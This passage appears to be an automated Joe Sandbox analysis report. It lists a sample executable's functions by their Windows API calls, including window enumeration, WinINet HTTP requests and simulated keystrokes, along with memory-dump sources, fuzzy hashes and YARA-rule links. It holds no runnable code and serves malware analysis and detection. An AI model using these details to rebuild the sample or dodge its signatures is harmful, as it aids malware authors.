                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ChildEnumWindows
                                                                                                                                                        • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                                                                        • API String ID: 3555792229-1603158881
                                                                                                                                                        • Opcode ID: 68a54acb87934b184928731ecea95bfc928abe1a8cc59fb582433f306cabb665
                                                                                                                                                        • Instruction ID: 030e96feb5e1517c6eebfd039d8234ec6faa02bfaacba343bc1bb156ff398c30
                                                                                                                                                        • Opcode Fuzzy Hash: 68a54acb87934b184928731ecea95bfc928abe1a8cc59fb582433f306cabb665
                                                                                                                                                        • Instruction Fuzzy Hash: 0D91B230A00506AACB0CDF64C581FEDFBB5FF09350F55812DE85AA7291DF30A95ADBA0
                                                                                                                                                        Function 00A945A7 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 211COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00A945F0
                                                                                                                                                        • CoUninitialize.COMBASE ref: 00A94695
                                                                                                                                                        • UnregisterHotKey.USER32(?), ref: 00A947BD
                                                                                                                                                        • DestroyWindow.USER32(?), ref: 00B05936
                                                                                                                                                        • FreeLibrary.KERNEL32(?), ref: 00B0599D
                                                                                                                                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00B059CA
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                                                                                        • String ID: close all
                                                                                                                                                        • API String ID: 469580280-3243417748
                                                                                                                                                        • Opcode ID: f8915c22228700c4ab95bfea328f8f338202c87c832ea2e4f91afd4ec6216923
                                                                                                                                                        • Instruction ID: acc57edc059813d41d159087cb91cc7e2a77c301a00aa7c25138f096735fbaab
                                                                                                                                                        • Opcode Fuzzy Hash: f8915c22228700c4ab95bfea328f8f338202c87c832ea2e4f91afd4ec6216923
                                                                                                                                                        • Instruction Fuzzy Hash: 32910834700602DFCB19EF64C995E69F7E4FF19704F5142A9E40AA76A2DB30AD6ACF00
                                                                                                                                                        Function 00AAC24A Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 185windowCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • SetWindowLongW.USER32(?,000000EB), ref: 00AAC2D2
                                                                                                                                                          • Part of subcall function 00AAC697: GetClientRect.USER32(?,?), ref: 00AAC6C0
                                                                                                                                                          • Part of subcall function 00AAC697: GetWindowRect.USER32(?,?), ref: 00AAC701
                                                                                                                                                          • Part of subcall function 00AAC697: ScreenToClient.USER32(?,000000FF), ref: 00AAC729
                                                                                                                                                        • GetDC.USER32 ref: 00B0E006
                                                                                                                                                        • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00B0E019
                                                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00B0E027
                                                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00B0E03C
                                                                                                                                                        • ReleaseDC.USER32(?,00000000), ref: 00B0E044
                                                                                                                                                        • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00B0E0CF
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                                                                                        • String ID: U
                                                                                                                                                        • API String ID: 4009187628-3372436214
                                                                                                                                                        • Opcode ID: fc9ea852577eec132e3617c9d45549a6756b5a2c080ecf6e52096851e7ab79ab
                                                                                                                                                        • Instruction ID: 7e881f400028d5740e9b08c898b6fa79c205e59cd70d9eed43e0fa5bc2d97a5f
                                                                                                                                                        • Opcode Fuzzy Hash: fc9ea852577eec132e3617c9d45549a6756b5a2c080ecf6e52096851e7ab79ab
                                                                                                                                                        • Instruction Fuzzy Hash: 0371DD31400209DFCF219FA4C881AEA7FB5FF49360F148AA9ED665B2E6D731C845DB60
                                                                                                                                                        Function 00AE4C23 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 133networkCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00AE4C5E
                                                                                                                                                        • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00AE4C8A
                                                                                                                                                        • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00AE4CCC
                                                                                                                                                        • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00AE4CE1
                                                                                                                                                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00AE4CEE
                                                                                                                                                        • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00AE4D1E
                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00AE4D65
                                                                                                                                                          • Part of subcall function 00AE56A9: GetLastError.KERNEL32(?,?,00AE4A2B,00000000,00000000,00000001), ref: 00AE56BE
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1241431887-3916222277
                                                                                                                                                        • Opcode ID: f234461c2a251e1592ab763404ce3237f1e34c3209a48dd4a88785333f2d4c9f
                                                                                                                                                        • Instruction ID: 1405ed1dff5180b80a2dc9e57148d9c91d25687f3872d9ad38ad07ce12667bbd
                                                                                                                                                        • Opcode Fuzzy Hash: f234461c2a251e1592ab763404ce3237f1e34c3209a48dd4a88785333f2d4c9f
                                                                                                                                                        • Instruction Fuzzy Hash: CA418DB1501658BFEB129F62CD89FFA77ACEF48314F10811AFA019B191DB74DD449BA0
                                                                                                                                                        Function 00AEBAE6 Relevance: 13.9, APIs: 9, Instructions: 419COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00B2DBF0), ref: 00AEBBA1
                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00B2DBF0), ref: 00AEBBD5
                                                                                                                                                        • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00AEBD33
                                                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 00AEBD5D
                                                                                                                                                        • StringFromGUID2.COMBASE(?,?,00000028), ref: 00AEBEAD
                                                                                                                                                        • ProgIDFromCLSID.COMBASE(?,?), ref: 00AEBEF7
                                                                                                                                                        • CoTaskMemFree.COMBASE(?), ref: 00AEBF14
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Free$FromString$FileLibraryModuleNamePathProgQueryTaskType
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 793797124-0
                                                                                                                                                        • Opcode ID: d644a19b9ea24b57e0d9ed5f02ac96e26e3f09c73fdb8bf16afc29846c543d65
                                                                                                                                                        • Instruction ID: 72c1552410be91b6bd01b8be8b35e23d1a3f7cb8d99ea3f59e03a2008fb18169
                                                                                                                                                        • Opcode Fuzzy Hash: d644a19b9ea24b57e0d9ed5f02ac96e26e3f09c73fdb8bf16afc29846c543d65
                                                                                                                                                        • Instruction Fuzzy Hash: 96F10A75A10109EFCF04DFA5C988EAEB7B9FF89314F108499F905AB250DB31AE41CB60
                                                                                                                                                        Function 00AAB86E Relevance: 13.7, APIs: 9, Instructions: 170timeCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00A949CA: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00A94954,00000000), ref: 00A94A23
                                                                                                                                                        • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00AAB85B), ref: 00AAB926
                                                                                                                                                        • KillTimer.USER32(00000000,?,00000000,?,?,?,?,00AAB85B,00000000,?,?,00AAAF1E,?,?), ref: 00AAB9BD
                                                                                                                                                        • DestroyAcceleratorTable.USER32(00000000), ref: 00B0E775
                                                                                                                                                        • DeleteObject.GDI32(00000000), ref: 00B0E7EB
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Destroy$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2402799130-0
                                                                                                                                                        • Opcode ID: f14faf17e85f8adc116ef6a43db8d98730972bafb36b21e4af73d8b2825f806f
                                                                                                                                                        • Instruction ID: 975c35db9def75b381faea0bdf4cd17fcc6458f55315c7954b316980201fad28
                                                                                                                                                        • Opcode Fuzzy Hash: f14faf17e85f8adc116ef6a43db8d98730972bafb36b21e4af73d8b2825f806f
                                                                                                                                                        • Instruction Fuzzy Hash: A8619A31110701CFDB369F29D988B26BBF5FB4A312F108999E196876B1CB75EC80CB60
                                                                                                                                                        Function 00AFB14A Relevance: 13.7, APIs: 9, Instructions: 167COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00AFB204
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InvalidateRect
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 634782764-0
                                                                                                                                                        • Opcode ID: 3b07169af6f3f8f65eafbdf8799370e55a1a6fcbcbb7b4fdcc771d6334a00de6
                                                                                                                                                        • Instruction ID: 7f75955480972c64c41f7c6049aa96c499d0e740e4b2df62bc3fb8ae81b4a7c4
                                                                                                                                                        • Opcode Fuzzy Hash: 3b07169af6f3f8f65eafbdf8799370e55a1a6fcbcbb7b4fdcc771d6334a00de6
                                                                                                                                                        • Instruction Fuzzy Hash: FE51A13066021CBEEB309FA8CC85BBE7B75AB06350F204615FB15DB5E1C771E9508B64
                                                                                                                                                        Function 00AAA599 Relevance: 13.7, APIs: 9, Instructions: 163windowCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00B0E9EA
                                                                                                                                                        • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00B0EA0B
                                                                                                                                                        • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00B0EA20
                                                                                                                                                        • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00B0EA3D
                                                                                                                                                        • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00B0EA64
                                                                                                                                                        • DestroyCursor.USER32(00000000), ref: 00B0EA6F
                                                                                                                                                        • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00B0EA8C
                                                                                                                                                        • DestroyCursor.USER32(00000000), ref: 00B0EA97
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CursorDestroyExtractIconImageLoadMessageSend
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3992029641-0
                                                                                                                                                        • Opcode ID: 36ccc63ce4f5a3ece75752a100d5e25cdd582f8dc7d55fe85ff59946a45724da
                                                                                                                                                        • Instruction ID: 57aceb0c7e07f0662213e95c792272152540948dd5cbb3202d849510ec5e2d1e
                                                                                                                                                        • Opcode Fuzzy Hash: 36ccc63ce4f5a3ece75752a100d5e25cdd582f8dc7d55fe85ff59946a45724da
                                                                                                                                                        • Instruction Fuzzy Hash: 1B515770A00209AFDB24CF69CC81FAA7BF5EB59750F104A59F956972D0DBB0ED80DB60
                                                                                                                                                        Function 00AAF6B5 Relevance: 13.6, APIs: 9, Instructions: 135COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,00B0E9A0,00000004,00000000,00000000), ref: 00AAF737
                                                                                                                                                        • ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,00B0E9A0,00000004,00000000,00000000), ref: 00AAF77E
                                                                                                                                                        • ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,00B0E9A0,00000004,00000000,00000000), ref: 00B0EB55
                                                                                                                                                        • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,00B0E9A0,00000004,00000000,00000000), ref: 00B0EBC1
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ShowWindow
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1268545403-0
                                                                                                                                                        • Opcode ID: 79cbbdc819f8bea4add073070430d417a922ec21ef3ce46d834431b2150aa642
                                                                                                                                                        • Instruction ID: df0dcffc298678caf1c80a9b92af6f2227e4891618a140eab96642f0acfbb366
                                                                                                                                                        • Opcode Fuzzy Hash: 79cbbdc819f8bea4add073070430d417a922ec21ef3ce46d834431b2150aa642
                                                                                                                                                        • Instruction Fuzzy Hash: E141D9312046809EDB3D47B88DC8B7A7BE5AB47301F684CADE09B435E1CB71E880D721
                                                                                                                                                        Function 00ACCDE6 Relevance: 13.6, APIs: 9, Instructions: 65sleepkeyboardwindowCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00ACE138: GetWindowThreadProcessId.USER32(?,00000000), ref: 00ACE158
                                                                                                                                                          • Part of subcall function 00ACE138: GetCurrentThreadId.KERNEL32 ref: 00ACE15F
                                                                                                                                                          • Part of subcall function 00ACE138: AttachThreadInput.USER32(00000000,?,00ACCD34,?,00000001), ref: 00ACE166
                                                                                                                                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 00ACCE06
                                                                                                                                                        • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00ACCE23
                                                                                                                                                        • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 00ACCE26
                                                                                                                                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 00ACCE2F
                                                                                                                                                        • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00ACCE4D
                                                                                                                                                        • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00ACCE50
                                                                                                                                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 00ACCE59
                                                                                                                                                        • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00ACCE70
                                                                                                                                                        • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00ACCE73
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2014098862-0
                                                                                                                                                        • Opcode ID: d8b57305c51f908054750416766cede815fa966fafa436d1355b2b007efb7beb
